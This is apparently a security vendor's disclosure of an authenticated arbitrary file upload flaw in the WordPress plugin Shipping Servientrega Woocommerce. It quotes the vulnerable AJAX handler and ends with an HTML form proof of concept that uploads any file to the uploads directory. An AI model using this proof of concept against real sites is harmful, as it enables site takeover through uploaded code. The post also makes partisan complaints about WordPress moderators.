Our Proactive Monitoring Caught an Authenticated Arbitrary File Upload Vulnerability Being Introduced in to a Woocommerce Extending Plugin
When it comes the security of WordPress plugins the unfortunate reality is that the same problems occur over and over and yet it seems we are largely alone in being interested in trying to take actions to address those. One of the issues with that is that what we can do is limited, most of the changes require the people in charge of the Plugin Directory being willing to work with others to fix them, which isn’t happening as they seem to be detached from reality and are unwilling to even acknowledge the problems exist, much less discuss making changes to fix those problems.
One rather frequent issue with the security of WordPress plugins is that plugins designed to extend WooCommerce, which is has on 4+ millions installs, are not properly restricting access to AJAX accessible functions. Seeing as by default that plugins allows untrusted individuals to create accounts, allowing any one logged in to WordPress to access functionality only intended for high level users is of particular concern.
Nearly a month we saw hackers probing for usage for one such plugin with 20,000+ installs and found:
Among the things anyone logged in can do is to delete products (or anything else stored as a WordPress post for that matter), change the price of products, change the title of products (or anything else stored as a WordPress post for that matter), but what seems like it could be of interest to hackers is that a setting can be changed and that can be used to cause authenticated persistent cross-site scripting (XSS).
A month later that plugin hasn’t been fixed and tens of thousands of websites are being left open to being hacked. The team running the Plugin Directory should have at least warned those using the plugin they are vulnerable and considering a hacker appears to be targeting this, fix the vulnerabilities, something we have offered to do most of the work for them.
It seems like the makers of WooCommerce, Automattic, which is closely tied to WordPress, should take some initiative to address what is going on, but that doesn’t appear to be the case.
One simple improvement would be for the Plugin Directory to notify the developers of new WooCommerce extending plugins being added to the WordPress Plugin Directory that they should be careful about that, since they are not getting the word now.
As one example of that, through our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities we caught an authenticated arbitrary file upload vulnerability being introduced in to the plugin Shipping Servientrega Woocommerce. That plugin was only added to the Plugin Directory two weeks ago, so it hasn’t had time to pick up a big install base, but if the install based continued to grow and that vulnerability had gone unnoticed it would be something that hackers would be interested in targeting.
Another solution for this would be for those using these plugin to get someone like us to do security reviews of them as that would help improve the security of their websites as well everyone else.
Missing The Basics
Like so many vulnerabilities this one is the result of multiple basic security failures.
The plugin registers the function servientrega_shipping_matriz() to be accessible through WordPress’ AJAX by anyone logged in to WordPress:
102 | add_action( 'wp_ajax_servientrega_shipping_matriz',array($this, 'servientrega_shipping_matriz')); |
That function, which is located in the file /includes/class-shipping-servientrega-wc-plugin.php, will save a file sent with a request to the directory /wp-content/uploads/ with the name “matrix” and the extension of the file:
178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 | public function servientrega_shipping_matriz() { $dir = $this->pathUpload(); $fileName = $_FILES["servientrega_xls"]["name"]; $fileTmpName = $_FILES["servientrega_xls"]["tmp_name"]; $name = $this->changeName($fileName); $pathXLS = $dir . $name; $result = [ 'status' => true ]; $wc_main_settings = get_option('woocommerce_servientrega_shipping_settings'); $wc_main_settings['shipping_servientrega_matriz'] = true; if (!move_uploaded_file($fileTmpName, $pathXLS)) |
What is missing there is a capabilities check to limit who can access that, protection against cross-site request forgery (CSRF), and a limit on what type of files can be uploaded. The page where this functionality is intended to be accessed from limits the files to be uploaded to the .xls extension, but the backend does not.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).
Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:
Is It Fixed?
If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.
Proof of Concept
The following proof of concept will place the uploaded file in to the directory /wp-content/uploads/ with the name “matrix” and the extension of the file, when logged in WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=servientrega_shipping_matriz" method="POST" enctype="multipart/form-data"> <input type="file" name="servientrega_xls" /> <input type="submit" value="Submit" /> </form> </body> </html>